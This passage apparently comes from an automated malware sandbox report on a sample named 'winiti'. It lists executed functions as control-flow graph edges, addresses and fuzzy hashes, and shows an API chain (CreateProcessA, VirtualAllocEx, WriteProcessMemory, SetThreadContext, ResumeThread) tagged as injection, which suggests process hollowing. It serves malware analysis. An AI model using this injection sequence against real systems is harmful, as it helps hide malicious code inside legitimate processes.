7445 7238ab ReadProcessMemory 7443->7445 7444->7442 7445->7442 7447 724e62 7446->7447 7494 723ae6 7447->7494 7498 723ae8 7447->7498 7448 724e96 7448->7355 7450 7238b0 ReadProcessMemory 7448->7450 7451 7238ab ReadProcessMemory 7448->7451 7449 72551a 7449->7355 7450->7449 7451->7449 7455 72374c WriteProcessMemory 7454->7455 7457 72383b 7455->7457 7457->7374 7459 72379c WriteProcessMemory 7458->7459 7461 72383b 7459->7461 7461->7374 7463 7238fc ReadProcessMemory 7462->7463 7465 72397a 7463->7465 7465->7384 7467 7238fc ReadProcessMemory 7466->7467 7469 72397a 7467->7469 7469->7384 7471 723541 Wow64SetThreadContext 7470->7471 7473 7235bf 7471->7473 7473->7411 7475 723541 Wow64SetThreadContext 7474->7475 7477 7235bf 7475->7477 7477->7411 7479 72344c ResumeThread 7478->7479 7481 72349e 7479->7481 7481->7421 7483 72344c ResumeThread 7482->7483 7485 72349e 7483->7485 7485->7421 7487 72366c VirtualAllocEx 7486->7487 7489 7236ea 7487->7489 7489->7435 7491 72366c VirtualAllocEx 7490->7491 7493 7236ea 7491->7493 7493->7435 7495 723b6f 7494->7495 7495->7495 7496 723d5a CreateProcessA 7495->7496 7497 723dcd 7496->7497 7499 723b6f 7498->7499 7499->7499 7500 723d5a CreateProcessA 7499->7500 7501 723dcd 7500->7501

                  Executed Functions

                  Function 002E3D98 Relevance: 8.2, Strings: 6, Instructions: 741COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 2e3d98-2e3dca 2 2e42fb-2e4319 0->2 3 2e3dd0-2e3e64 0->3 6 2e4714-2e4720 2->6 28 2e3e66-2e3e6a 3->28 29 2e3e70-2e3ec7 3->29 8 2e4726 6->8 9 2e4327-2e4333 6->9 12 2e4738-2e473f 8->12 10 2e4728-2e472d 9->10 11 2e4339-2e43b9 9->11 10->12 30 2e43bb-2e43c1 11->30 31 2e43d1-2e43ea 11->31 28->29 55 2e3ecd-2e3ed5 29->55 56 2e4245-2e4269 29->56 32 2e43c5-2e43c7 30->32 33 2e43c3 30->33 37 2e43ec-2e4415 31->37 38 2e441a-2e4458 31->38 32->31 33->31 48 2e4711 37->48 51 2e447d-2e448a 38->51 52 2e445a-2e447b 38->52 48->6 61 2e4491-2e4497 51->61 52->61 58 2e3edc-2e3ee4 55->58 59 2e3ed7-2e3edb 55->59 65 2e42ed-2e42f8 56->65 62 2e3ee9-2e3f0b 58->62 63 2e3ee6 58->63 59->58 66 2e4499-2e44b4 61->66 67 2e44b6-2e4508 61->67 71 2e3f0d 62->71 72 2e3f10-2e3f16 62->72 63->62 65->2 66->67 101 2e450e-2e4513 67->101 102 2e4623-2e4662 67->102 71->72 75 2e3f1c-2e3f36 72->75 76 2e41c5-2e41d0 72->76 79 2e3f7b-2e3f84 75->79 80 2e3f38-2e3f3c 75->80 81 2e41d5-2e420c call 2e0b74 76->81 82 2e41d2 76->82 84 2e3f8a-2e3f9a 79->84 85 2e42e8 79->85 80->79 83 2e3f3e-2e3f49 80->83 119 2e420e-2e4238 81->119 120 2e423a-2e423f 81->120 82->81 86 2e3f4f 83->86 87 2e3fd7-2e4084 83->87 84->85 90 2e3fa0-2e3fb1 84->90 85->65 91 2e3f52-2e3f54 86->91 103 2e4086 87->103 104 2e4094-2e415c 87->104 90->85 93 2e3fb7-2e3fc7 90->93 94 2e3f5a-2e3f65 91->94 95 2e3f56 91->95 93->85 98 2e3fcd-2e3fd4 93->98 94->85 100 2e3f6b-2e3f77 94->100 95->94 98->87 100->91 106 2e3f79 100->106 109 2e451d-2e4520 101->109 125 2e467e-2e468d 102->125 126 2e4664-2e467c 102->126 103->104 105 2e4088-2e408e 103->105 122 2e426e-2e4280 104->122 123 2e4162-2e4166 104->123 105->104 106->87 111 2e45eb-2e4613 109->111 112 2e4526 109->112 124 2e4619-2e461d 111->124 115 2e455e-2e458a 112->115 116 2e458f-2e45bb 112->116 117 2e452d-2e4559 112->117 118 2e45bd-2e45e9 112->118 115->124 116->124 117->124 118->124 119->120 120->56 122->85 129 2e4282-2e429f 122->129 123->122 130 2e416c-2e417b 123->130 124->102 124->109 134 2e4696-2e46f8 125->134 126->134 129->85 135 2e42a1-2e42bd 129->135 136 2e417d 130->136 137 2e41bb-2e41bf 130->137 148 2e4703-2e470a 134->148 135->85 139 2e42bf-2e42dd 135->139 140 2e4183-2e4185 136->140 137->75 137->76 139->85 142 2e42df 139->142 143 2e418f-2e41ab 140->143 144 2e4187-2e418b 140->144 142->85 143->85 146 2e41b1-2e41b9 143->146 144->143 146->137 146->140 148->48
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID: 4'p$TJp$Tep$pp$sk?$xbp
                  • API String ID: 0-448541618
                  • Opcode ID: 7c12118c621e7fa216ae27efba14fc0f006a15a6a7d1ebd42d9d2e3c0951c885
                  • Instruction ID: b7bedc98f6c74f092c3dabd0bb3520a95e5acdc3b3f89d57f6c97ae847c59863
                  • Opcode Fuzzy Hash: 7c12118c621e7fa216ae27efba14fc0f006a15a6a7d1ebd42d9d2e3c0951c885
                  • Instruction Fuzzy Hash: 22624635A10254DFDB15DFA9C884F68BBB2FF49304F5681A8E509AB266CB31ED91CF40
                  Function 002E04C8 Relevance: 2.9, Strings: 1, Instructions: 1698COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 189 2e04c8-2e11a3 192 2e11aa-2e1740 call 2e0788 * 2 call 2e0798 * 2 call 2e07a8 * 2 call 2e07b8 call 2e07a8 * 2 call 2e0788 call 2e07c8 call 2e07a8 call 2e07d8 call 2e07e8 call 2e07f8 call 2e0808 call 2e0818 call 2e0828 call 2e0d68 call 2e07e8 call 2e07f8 call 2e0808 189->192 193 2e11a5 189->193 281 2e1909-2e191c 192->281 193->192 282 2e1745-2e174c 281->282 283 2e1922-2e2148 call 2e0818 call 2e0828 call 2e0d68 call 2e07e8 call 2e07f8 call 2e0808 call 2e0818 call 2e0828 call 2e0d68 call 2e07e8 call 2e07f8 call 2e0808 call 2e0d78 call 2e0818 call 2e0828 call 2e0d68 call 2e07e8 call 2e07f8 call 2e0808 call 2e0818 call 2e0828 call 2e0d88 call 2e0d68 call 2e0d98 call 2e07e8 call 2e07f8 call 2e0808 call 2e0818 call 2e0828 call 2e0d88 call 2e0d68 call 2e0d98 call 2e07f8 call 2e0808 call 2e0818 call 2e0828 call 2e0da8 281->283 284 2e1787-2e1798 282->284 406 2e214f-2e221f call 2e0db8 283->406 407 2e214a 283->407 285 2e174e-2e177b 284->285 286 2e179a-2e17cf 284->286 290 2e177d-2e1782 285->290 291 2e1783-2e1784 285->291 288 2e17d6-2e17fd 286->288 289 2e17d1 286->289 293 2e17ff 288->293 294 2e1804-2e1848 288->294 289->288 290->291 291->284 293->294 297 2e184f-2e1890 294->297 298 2e184a 294->298 300 2e1897-2e18b8 297->300 301 2e1892 297->301 298->297 302 2e18f2-2e1903 300->302 301->300 303 2e18ba-2e18e7 302->303 304 2e1905-2e1906 302->304 307 2e18ee-2e18ef 303->307 308 2e18e9-2e18ed 303->308 304->281 307->302 308->307 415 2e222a-2e2db0 call 2e0d68 call 2e0dc8 call 2e07e8 call 2e07f8 call 2e0808 call 2e0818 call 2e0828 call 2e0d88 call 2e0d98 call 2e07e8 call 2e07f8 call 2e0808 call 2e0818 call 2e0828 call 2e0d88 call 2e0d98 call 2e07e8 call 2e07f8 call 2e0808 call 2e0818 call 2e0828 call 2e07f8 call 2e0808 call 2e0818 call 2e0dd8 call 2e0de8 call 2e0df8 call 2e07e8 call 2e07f8 call 2e0808 call 2e0818 call 2e0828 call 2e0d88 call 2e0d98 call 2e0e08 call 2e0e18 call 2e0e28 call 2e0e38 * 12 call 2e0808 call 2e0e48 call 2e0e58 call 2e0e68 406->415 407->406
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID: Ppp
                  • API String ID: 0-99483665
                  • Opcode ID: 7455dd48efe38d3cf36f909daf542dcf415df1db73340fb7b96e80c769cf9700
                  • Instruction ID: d073e1565b52d4010757a6a2d51bfebf873b7142bc73e65957714e571a0f38f9
                  • Opcode Fuzzy Hash: 7455dd48efe38d3cf36f909daf542dcf415df1db73340fb7b96e80c769cf9700
                  • Instruction Fuzzy Hash: DE03D334A5121ACFCB64DB64C894AE9B7B2FF8A304F5145E9E4096B361DB71AEC1CF40
                  Function 002E1168 Relevance: 2.8, Strings: 1, Instructions: 1547COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 574 2e1168-2e1175 575 2e118f-2e11a3 574->575 576 2e1177-2e118b 574->576 577 2e11aa-2e1516 call 2e0788 * 2 call 2e0798 * 2 call 2e07a8 * 2 call 2e07b8 call 2e07a8 * 2 call 2e0788 call 2e07c8 call 2e07a8 call 2e07d8 call 2e07e8 575->577 578 2e11a5 575->578 576->575 639 2e1520-2e1534 call 2e07f8 577->639 578->577 641 2e1539-2e1740 call 2e0808 call 2e0818 call 2e0828 call 2e0d68 call 2e07e8 call 2e07f8 call 2e0808 639->641 666 2e1909-2e191c 641->666 667 2e1745-2e174c 666->667 668 2e1922-2e20ff call 2e0818 call 2e0828 call 2e0d68 call 2e07e8 call 2e07f8 call 2e0808 call 2e0818 call 2e0828 call 2e0d68 call 2e07e8 call 2e07f8 call 2e0808 call 2e0d78 call 2e0818 call 2e0828 call 2e0d68 call 2e07e8 call 2e07f8 call 2e0808 call 2e0818 call 2e0828 call 2e0d88 call 2e0d68 call 2e0d98 call 2e07e8 call 2e07f8 call 2e0808 call 2e0818 call 2e0828 call 2e0d88 call 2e0d68 call 2e0d98 call 2e07f8 call 2e0808 call 2e0818 call 2e0828 call 2e0da8 666->668 669 2e1787-2e1798 667->669 788 2e2105-2e2132 668->788 670 2e174e-2e177b 669->670 671 2e179a-2e17cf 669->671 675 2e177d-2e1782 670->675 676 2e1783-2e1784 670->676 673 2e17d6-2e17fd 671->673 674 2e17d1 671->674 678 2e17ff 673->678 679 2e1804-2e1848 673->679 674->673 675->676 676->669 678->679 682 2e184f-2e1890 679->682 683 2e184a 679->683 685 2e1897-2e18b8 682->685 686 2e1892 682->686 683->682 687 2e18f2-2e1903 685->687 686->685 688 2e18ba-2e18e7 687->688 689 2e1905-2e1906 687->689 692 2e18ee-2e18ef 688->692 693 2e18e9-2e18ed 688->693 689->666 692->687 693->692 790 2e2138-2e2148 788->790 791 2e214f-2e21f6 call 2e0db8 790->791 792 2e214a 790->792 799 2e2201-2e221f 791->799 792->791 800 2e222a-2e2db0 call 2e0d68 call 2e0dc8 call 2e07e8 call 2e07f8 call 2e0808 call 2e0818 call 2e0828 call 2e0d88 call 2e0d98 call 2e07e8 call 2e07f8 call 2e0808 call 2e0818 call 2e0828 call 2e0d88 call 2e0d98 call 2e07e8 call 2e07f8 call 2e0808 call 2e0818 call 2e0828 call 2e07f8 call 2e0808 call 2e0818 call 2e0dd8 call 2e0de8 call 2e0df8 call 2e07e8 call 2e07f8 call 2e0808 call 2e0818 call 2e0828 call 2e0d88 call 2e0d98 call 2e0e08 call 2e0e18 call 2e0e28 call 2e0e38 * 12 call 2e0808 call 2e0e48 call 2e0e58 call 2e0e68 799->800
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID: Ppp
                  • API String ID: 0-99483665
                  • Opcode ID: fb20828812458ceb0529c538adf6909a636b6d2360653a2861bde81355375106
                  • Instruction ID: 10ecce4f93f06575842f9fe2baaeb12f71a72bf61ead311144195fa464a5d061
                  • Opcode Fuzzy Hash: fb20828812458ceb0529c538adf6909a636b6d2360653a2861bde81355375106
                  • Instruction Fuzzy Hash: ADF2D234A5121ACFCB64EB64C894AE9B7B1FF8A304F5145E9E4096B361DB71AEC1CF40
                  Function 002E4B55 Relevance: 5.1, Strings: 4, Instructions: 136COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 149 2e4b55-2e4bd6 158 2e4bee-2e4c41 149->158 159 2e4bd8-2e4bde 149->159 167 2e4c59-2e4c7a 158->167 168 2e4c43-2e4c49 158->168 160 2e4be2-2e4be4 159->160 161 2e4be0 159->161 160->158 161->158 185 2e4c7c call 2eab70 167->185 186 2e4c7c call 2eab80 167->186 169 2e4c4d-2e4c4f 168->169 170 2e4c4b 168->170 169->167 170->167 173 2e4c82-2e4cf7 187 2e4cf9 call 2eb2d8 173->187 188 2e4cf9 call 2eb2b0 173->188 182 2e4cff-2e4d23 185->173 186->173 187->182 188->182
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID: $p$$p$$p$$p
                  • API String ID: 0-3121760203
                  • Opcode ID: 98e2d50669a029b7e838d30985a43f1f3ed78ac1d8c080274eeaffbc9a0b3665
                  • Instruction ID: 39ffcc25ce95d7d473908939c8be77d11bca2085ef6988f844ee7156dc1de56f
                  • Opcode Fuzzy Hash: 98e2d50669a029b7e838d30985a43f1f3ed78ac1d8c080274eeaffbc9a0b3665
                  • Instruction Fuzzy Hash: 24419134B002009FD718AB78EC55B6E7BE2EFC8301F64806AE506D73A9CE359D41CBA1
                  Function 002EDBE8 Relevance: 2.7, Strings: 2, Instructions: 175COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 959 2edbe8-2edc0b 960 2edc0d 959->960 961 2edc12-2ede01 call 2e0b74 call 2edb90 959->961 960->961 979 2edc5d-2edc62 961->979 980 2ede07 961->980 981 2edc68-2edc69 979->981 982 2edd15-2edd35 979->982 981->982 984 2eddce-2edde3 982->984 985 2edd3b-2edd3c call 2e0c38 982->985 995 2edcef-2edcf9 985->995
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID: Tep$Tep
                  • API String ID: 0-347264811
                  • Opcode ID: e1f8660031ccb84c1136d1b7b4bd84f5cf0faa75745a230e829c37c06c2d454b
                  • Instruction ID: 19106e3c58beb5f978c2bd00894fdea0bd16e704322fbf8b261964c8e73276d4
                  • Opcode Fuzzy Hash: e1f8660031ccb84c1136d1b7b4bd84f5cf0faa75745a230e829c37c06c2d454b
                  • Instruction Fuzzy Hash: 8961D274E142488FDB08CFAAC884AEDFBB6FF89300F64902AE419AB355DB705955CF50
                  Function 002E4980 Relevance: 2.6, Strings: 2, Instructions: 111COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 996 2e4980-2e49db call 2e4da0 1000 2e49e1-2e4a29 call 2e0b74 call 2e3980 call 2e0bac 996->1000 1010 2e4a2c-2e4a57 1000->1010 1013 2e4a7c-2e4a7e 1010->1013 1014 2e4a59-2e4a74 1010->1014 1013->1010 1015 2e4a80-2e4aef 1013->1015 1014->1013 1024 2e4b0f 1015->1024 1025 2e4af1-2e4b06 1015->1025 1025->1024
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.443620047.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_2e0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID: Tep$Tep
                  • API String ID: 0-347264811
                  • Opcode ID: 6b934b7fc6ebb746b89e0f6e946a86d7f0919c06c21b6a40858ab2f8197b8428
                  • Instruction ID: ebdeeabdb3d5ba22867423827f3795c979c34f7ff19639d313fbdaa0bccecc45
                  • Opcode Fuzzy Hash: 6b934b7fc6ebb746b89e0f6e946a86d7f0919c06c21b6a40858ab2f8197b8428
                  • Instruction Fuzzy Hash: 9541D230B111049BD719BB69D96976F7BB6EBC8301F20402AE5069B389CF789D418BD1
                  Function 00723AE8 Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1034 723ae8-723b81 1036 723b83-723b9a 1034->1036 1037 723bca-723bf2 1034->1037 1036->1037 1040 723b9c-723ba1 1036->1040 1041 723bf4-723c08 1037->1041 1042 723c38-723c8e 1037->1042 1043 723ba3-723bad 1040->1043 1044 723bc4-723bc7 1040->1044 1041->1042 1049 723c0a-723c0f 1041->1049 1051 723c90-723ca4 1042->1051 1052 723cd4-723dcb CreateProcessA 1042->1052 1046 723bb1-723bc0 1043->1046 1047 723baf 1043->1047 1044->1037 1046->1046 1050 723bc2 1046->1050 1047->1046 1053 723c32-723c35 1049->1053 1054 723c11-723c1b 1049->1054 1050->1044 1051->1052 1060 723ca6-723cab 1051->1060 1070 723dd4-723eb9 1052->1070 1071 723dcd-723dd3 1052->1071 1053->1042 1055 723c1f-723c2e 1054->1055 1056 723c1d 1054->1056 1055->1055 1059 723c30 1055->1059 1056->1055 1059->1053 1062 723cce-723cd1 1060->1062 1063 723cad-723cb7 1060->1063 1062->1052 1064 723cbb-723cca 1063->1064 1065 723cb9 1063->1065 1064->1064 1066 723ccc 1064->1066 1065->1064 1066->1062 1084 723ebb-723ebf 1070->1084 1085 723ec9-723ecd 1070->1085 1071->1070 1084->1085 1086 723ec1 1084->1086 1087 723ecf-723ed3 1085->1087 1088 723edd-723ee1 1085->1088 1086->1085 1087->1088 1089 723ed5 1087->1089 1090 723ee3-723ee7 1088->1090 1091 723ef1-723ef5 1088->1091 1089->1088 1090->1091 1094 723ee9 1090->1094 1092 723ef7-723f20 1091->1092 1093 723f2b-723f36 1091->1093 1092->1093 1098 723f37 1093->1098 1094->1091 1098->1098
                  APIs
                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00723DAF
                  Memory Dump Source
                  • Source File: 00000009.00000002.444083385.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_720000_winiti.jbxd
                  Similarity
                  • API ID: CreateProcess
                  • String ID:
                  • API String ID: 963392458-0
                  • Opcode ID: 6a3988bfbf0d801a78e337bb2022e1fe073e621c7e1750458e00d8dcd8cda80f
                  • Instruction ID: a295598dfd84b1c7e671ec46d08a7abd468ad1ecd9af365919c893483446fc6b
                  • Opcode Fuzzy Hash: 6a3988bfbf0d801a78e337bb2022e1fe073e621c7e1750458e00d8dcd8cda80f
                  • Instruction Fuzzy Hash: E5C10871D002698FDF25CFA8D841BEDBBB1BF05300F0095A9D919B7250DB789A89CF95
                  Function 00723AE6 Relevance: 1.8, APIs: 1, Instructions: 322processCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1099 723ae6-723b81 1101 723b83-723b9a 1099->1101 1102 723bca-723bf2 1099->1102 1101->1102 1105 723b9c-723ba1 1101->1105 1106 723bf4-723c08 1102->1106 1107 723c38-723c8e 1102->1107 1108 723ba3-723bad 1105->1108 1109 723bc4-723bc7 1105->1109 1106->1107 1114 723c0a-723c0f 1106->1114 1116 723c90-723ca4 1107->1116 1117 723cd4-723dcb CreateProcessA 1107->1117 1111 723bb1-723bc0 1108->1111 1112 723baf 1108->1112 1109->1102 1111->1111 1115 723bc2 1111->1115 1112->1111 1118 723c32-723c35 1114->1118 1119 723c11-723c1b 1114->1119 1115->1109 1116->1117 1125 723ca6-723cab 1116->1125 1135 723dd4-723eb9 1117->1135 1136 723dcd-723dd3 1117->1136 1118->1107 1120 723c1f-723c2e 1119->1120 1121 723c1d 1119->1121 1120->1120 1124 723c30 1120->1124 1121->1120 1124->1118 1127 723cce-723cd1 1125->1127 1128 723cad-723cb7 1125->1128 1127->1117 1129 723cbb-723cca 1128->1129 1130 723cb9 1128->1130 1129->1129 1131 723ccc 1129->1131 1130->1129 1131->1127 1149 723ebb-723ebf 1135->1149 1150 723ec9-723ecd 1135->1150 1136->1135 1149->1150 1151 723ec1 1149->1151 1152 723ecf-723ed3 1150->1152 1153 723edd-723ee1 1150->1153 1151->1150 1152->1153 1154 723ed5 1152->1154 1155 723ee3-723ee7 1153->1155 1156 723ef1-723ef5 1153->1156 1154->1153 1155->1156 1159 723ee9 1155->1159 1157 723ef7-723f20 1156->1157 1158 723f2b-723f36 1156->1158 1157->1158 1163 723f37 1158->1163 1159->1156 1163->1163
                  APIs
                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00723DAF
                  Memory Dump Source
                  • Source File: 00000009.00000002.444083385.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_720000_winiti.jbxd
                  Similarity
                  • API ID: CreateProcess
                  • String ID:
                  • API String ID: 963392458-0
                  • Opcode ID: 1717ee7c029e52ee68728c39b4a7098e18d30f8631938283483a5c2be286a585
                  • Instruction ID: b17cac5b99fb8f34d63dafd102a6ea33139552b623e0e4cfc39a5ac28527b775
                  • Opcode Fuzzy Hash: 1717ee7c029e52ee68728c39b4a7098e18d30f8631938283483a5c2be286a585
                  • Instruction Fuzzy Hash: EBC10871D002698FDF25CFA8D841BEDBBB1BF05300F0095AAD919B7250DB789A89CF95
                  Function 00723748 Relevance: 1.6, APIs: 1, Instructions: 121injectionCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1164 723748-7237bb 1167 7237d2-723839 WriteProcessMemory 1164->1167 1168 7237bd-7237cf 1164->1168 1170 723842-723894 1167->1170 1171 72383b-723841 1167->1171 1168->1167 1171->1170
                  APIs
                  • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00723823
                  Memory Dump Source
                  • Source File: 00000009.00000002.444083385.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_720000_winiti.jbxd
                  Similarity
                  • API ID: MemoryProcessWrite
                  • String ID:
                  • API String ID: 3559483778-0
                  • Opcode ID: ae96865d72e2a13a07711404f5c20d46b01a3079f67ac12c5d701c62ad530b1f
                  • Instruction ID: 63220eac5cb24e077dadee770919037ed1ac4a278d1d242f4c09dd5773ce4910
                  • Opcode Fuzzy Hash: ae96865d72e2a13a07711404f5c20d46b01a3079f67ac12c5d701c62ad530b1f
                  • Instruction Fuzzy Hash: 91419CB5D012589FCF10CFA9D984AEEFBF1BB49314F24942AE814B7250D338AA55CF64
                  Function 00723750 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1176 723750-7237bb 1178 7237d2-723839 WriteProcessMemory 1176->1178 1179 7237bd-7237cf 1176->1179 1181 723842-723894 1178->1181 1182 72383b-723841 1178->1182 1179->1178 1182->1181
                  APIs
                  • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00723823
                  Memory Dump Source
                  • Source File: 00000009.00000002.444083385.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_720000_winiti.jbxd
                  Similarity
                  • API ID: MemoryProcessWrite
                  • String ID:
                  • API String ID: 3559483778-0
                  • Opcode ID: 6e2ac00a116bdfa69cb523d00f8e1a190c8c15971eea956d3d2a15b5b450cf80
                  • Instruction ID: 3c314dc1fdd76a4f31f90b797ec4ef0b5a50891013d505c8596b011c3b90902e
                  • Opcode Fuzzy Hash: 6e2ac00a116bdfa69cb523d00f8e1a190c8c15971eea956d3d2a15b5b450cf80
                  • Instruction Fuzzy Hash: 7141ACB4D012589FCF10CFA9D984AEEFBF1BB49314F20902AE814B7210D338AA45CF64
                  Function 007238B0 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1196 7238b0-723978 ReadProcessMemory 1199 723981-7239d3 1196->1199 1200 72397a-723980 1196->1200 1200->1199
                  APIs
                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00723962
                  Memory Dump Source
                  • Source File: 00000009.00000002.444083385.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_720000_winiti.jbxd
                  Similarity
                  • API ID: MemoryProcessRead
                  • String ID:
                  • API String ID: 1726664587-0
                  • Opcode ID: 7849f27389f37446232fd08042aa76c55af369b8965448dd2c766fcda99893d3
                  • Instruction ID: 1485e6437faacb3d4c0375c80ff0b244c9f99229dcc20f8e55ba8a9f4f4ec9d5
                  • Opcode Fuzzy Hash: 7849f27389f37446232fd08042aa76c55af369b8965448dd2c766fcda99893d3
                  • Instruction Fuzzy Hash: 5141BAB4D002589FCF10CFAAD984AEEFBB1BF49314F10942AE814B7200C779AA45CF64
                  Function 007238AB Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1187 7238ab-723978 ReadProcessMemory 1190 723981-7239d3 1187->1190 1191 72397a-723980 1187->1191 1191->1190
                  APIs
                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00723962
                  Memory Dump Source
                  • Source File: 00000009.00000002.444083385.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_720000_winiti.jbxd
                  Similarity
                  • API ID: MemoryProcessRead
                  • String ID:
                  • API String ID: 1726664587-0
                  • Opcode ID: cbfb04f42628b44b8730288fe5d9c78b7d5e595bd81acbc039bc504b34a21862
                  • Instruction ID: 9b077148940187197735aeade1e31216f019cee309c280e80aa8200a3985e91f
                  • Opcode Fuzzy Hash: cbfb04f42628b44b8730288fe5d9c78b7d5e595bd81acbc039bc504b34a21862
                  • Instruction Fuzzy Hash: 1C41BAB5D002589FCF10CFA9D984AEEFBB1BF49314F14942AE814B7210C379A946CF64
                  Function 00723623 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1205 723623-7236e8 VirtualAllocEx 1208 7236f1-72373b 1205->1208 1209 7236ea-7236f0 1205->1209 1209->1208
                  APIs
                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 007236D2
                  Memory Dump Source
                  • Source File: 00000009.00000002.444083385.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_720000_winiti.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 75b69b350741b4c770e34c2812d7114def60f86fb4c08523ea7014a2e907650b
                  • Instruction ID: 53aeeed01b3416d5252832628a0a9fe5e7b377c4ac2d6e7f6beb5517567697b9
                  • Opcode Fuzzy Hash: 75b69b350741b4c770e34c2812d7114def60f86fb4c08523ea7014a2e907650b
                  • Instruction Fuzzy Hash: A141A9B8D042589FCF10CFA9E980AEEFBB1BB49310F20942AE815B7310C735A956CF55
                  Function 00723628 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1214 723628-7236e8 VirtualAllocEx 1217 7236f1-72373b 1214->1217 1218 7236ea-7236f0 1214->1218 1218->1217
                  APIs
                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 007236D2
                  Memory Dump Source
                  • Source File: 00000009.00000002.444083385.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_720000_winiti.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 5115aa07128a40bb03fb615aff7c0893c5ef23db4021057056bb724e754d49d5
                  • Instruction ID: d3bb32d0c83b72f7562424e077047e93cdf73ce7a7a909c7bd4d02a89491c948
                  • Opcode Fuzzy Hash: 5115aa07128a40bb03fb615aff7c0893c5ef23db4021057056bb724e754d49d5
                  • Instruction Fuzzy Hash: 2A4199B8D00258ABCF10CFA9E984AAEFBB5AB49310F10942AE815B7310D735A955CF65
                  Function 007234F8 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                  Download Yara Rule
                  APIs
